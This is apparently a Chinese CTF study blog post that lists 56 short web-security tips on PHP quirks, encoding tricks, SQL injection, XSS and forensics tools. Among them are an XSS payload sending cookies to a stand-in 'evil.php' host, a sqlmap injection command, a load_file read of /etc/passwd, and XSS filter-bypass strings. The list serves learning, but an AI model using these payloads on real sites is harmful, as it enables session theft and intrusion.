Some Tips

Posted 2020-09-07

1 md5不能加密数组，所以就会返回Null,而Null===Null

2 phps为.php源代码文件

3 在浏览器中提交时浏览器会为我们进行一次解码，有时需要2次编码

4 需要绕过eregi和urldecode时，可查询url编码表如admin=>%61dmin=>%2561dmin

5 PHP弱类型的一个特性，当一个整形和一个其他类型行比较的时候，会先把其他类型intval再比。

6 +会被 SQL 解析成空格

7 有时需要对#进行 URL 编码，不然会破坏 SQL 语句的完整性（当然这仅限于 GET 注入，POST 注入是不用再编码的，你可以先简单的认为 GET 注入就是出现在 GET 参数中的注入，POST 注入就是出现在 POST 参数中的注入）。

8 在 javascript 中，用分号来结束语句是可选的。

9 const 关键字，用于定义变量。 一些 JavaScript 引擎把 const 当作 var 的同义词。另一些引擎则把 const 当作只读变量的定义。

10 js回传一些信息

1	page=<script>location.href=‘http://example/evil.php?cookie=‘+encodeURIComponent(document.cookie)</script>

11 tomcat的examples目录下存在一个文件可以修改任意session。

12 首选判断是文件读取还是文件包含，因为file_get_content(“/etc/passwd”)和include(“/etc/passwd”)黑盒来看的表现可能一样。而文件包含是可以getshell的，文件读取就只能读取文件。可以通过尝试读取相对路径的脚本文件，比如/read.php?file=read.php的方式，如果可以读取到文件源码，说明是文件读取，如果不能读取到文件源码说明是文件包含。

13 base36,base62

14 curl乱码用–compressed

15 查询mysql数据库中所有表名

1	SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = ‘数据库名‘

16 .phtml .php

17 /var/www/html/

18 X-Forwarded-For:与 client-ip:

19 grep -a ‘flag’ xx.pcapng

20 php的bug简单来说就是当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 然后绕过正则的话我们可以在对象长度前加一个 + 号

21 .htaccess

22 base64可加密不可显字符

23 所有的doc文档或者docx文档都可以以zip或者rar打开

24 VM下载地址

25 wireshark过筛选POST http.request.method==POST

26 jinja文件模板注入2

27 sqlmap POST注入

1	sqlmap -u "127.0.0.1/test.php" --data "username=admin&password=admin&Submit=Login" --level=5 --risk=3 --dbs

28 print ‘\xc4\xe6\xc1\xf7\xb6\xf8\xc9\xcf\xb5\xc4\xbf\xc9\xc0\xd6’.decode(‘gbk’)

29 chrome开代理google-chrome–proxy-server=”socks5://localhost:7077”或http://

30 通常所用的函数是int()或者intval()然而出于phpwtf的atoi转换规则，$s-0足以完成。

31 列出test中所有的ASCII文本： strings test 列出test中所有的ASCII文本： cat test strings 查找test中包含ttt的字符串，不区分大小写： strings test | grep -i ttt

32 英文字母所用的ascii字符只占用七个bit。而计算总长度发现不为8的倍数而为7的倍数。

33 ereg函数%00截断及遇到%00则默认为字符串的结束

34 其实url编码就是一个字符ascii码的十六进制

35 python上传

1 2 3

data = { ‘name‘: ‘test‘ } files = {‘file‘: open("test.txt", ‘rb‘)} response = requests.post(url, data=data, files=files)

36 htmlentities($str, ENT_QUOTES) 这是一个单引号过滤。我们就没有办法添加单引号闭合了，只能运用转义字符吃掉单引号了

37 linux xxd命令

38 binwalk分析文件,-e分离文件

39 .bash_history

40 %df\x3cimg src=123 onerror=alert();%df\x3e 利用宽字节绕过<>的过滤

41 session是httponly的，一般无法通过document.cookie获取到cookie

42 JS 字符转ascii码：用charCodeAt();ascii码转字符：用fromCharCode();

43 JS base64加解密: atob() 和 btoa()

44 JS “a”.charCodeAt(); String.fromCharCode(97,98);

45 select `load_file`(0x2f6574632f706173737764),0x2f6574632f706173737764是/etc/passwd的十六进制格式。

46 PHP不允许堆叠查询

47 linux用户密码存储在/etc/shadow

48 只有数据包中http头含有X-XSS-Protection并且值为0的时候，浏览器才不会开启filter。(CRLF:CRLF是”回车 + 换行”（\r\n）的简称。)

49 SSH另类应用Socket5代理

50 ubuntu下搭建hexo博客重要几个步骤

1 2 3 4

sudo npm install hexo -g sudo npm install hexp --save 切换到/hexo-demo目录 npm install hexo server

51 下面这2行都可以实现弹窗，原理暂时不明白。。。

1 2	<img src=x onerror= +alert(1)> <img src=x onerror= -alert(1)>

52 通过Mysql语句得到mysql安装路径：

1 2	select @@basedir as basePath from dual select @@basedir;

53 另类命令执行

1	echo $(ls)

54 通过cat读当前目录下的所有东西

1

cat *

55 如果在函数中 unset() 一个静态变量，那么在函数内部此静态变量将被销毁。但是，当再次调用此函数时，此静态变量将被复原为上次被销毁之前的值。

未完待续2333…

56 php ereg绕过（有时候还可以用%00）

1	<?php echo ereg("110*", "1104");?>